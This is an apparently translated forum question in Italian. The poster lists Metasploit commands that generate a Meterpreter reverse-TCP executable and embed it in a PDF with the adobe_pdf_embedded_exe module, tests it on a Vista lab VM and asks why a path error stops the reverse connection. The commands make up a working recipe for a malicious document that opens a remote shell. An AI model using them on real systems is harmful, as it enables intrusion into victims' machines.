Questi sono i passaggi che ho eseguito per generare un PDF incorporato con exe.
Macchina attaccante (Windows 7):
msf > use windows/meterpreter/reverse_tcp
msf payload(reverse_tcp) > set LHOST 192.168.0.102
msf payload(reverse_tcp) > generate -f C:\Users\User\Desktop\file.exe
msf payload(reverse_tcp) > use exploit/windows/fileformat/adobe_pdf_embedded_exe
msf exploit(adobe_pdf_embedded_exe) > set EXENAME C:\Users\User\Desktop\file.exe
msf exploit(adobe_pdf_embedded_exe) > set FILENAME file.pdf
msf exploit(adobe_pdf_embedded_exe) > set INFILENAME C:\Users\User\Downloads\infile.pdf
msf exploit(adobe_pdf_embedded_exe) > exploit
Configurazione un gestore e inizio ad ascoltare la connessione inversa.
Macchina vittima (Windows Vista Ultimate su VM):
Sono in grado di scaricare il file pdf dannoso. Viene visualizzato il messaggio di avvio, ma non appena viene avviata l'esecuzione del payload (attiva una console su Vista), viene visualizzato un errore sulla macchina vittima che dice:
Windows cannot find 'C:UsersUserDownloadsinfile.pdf'. Make sure you typed the name correctly and try again.
La console esce senza creare alcuna connessione inversa.
Domanda:
C'è qualche passaggio che mi manca o è il problema con le barre nel percorso del file che ho inserito nel metasploit framework?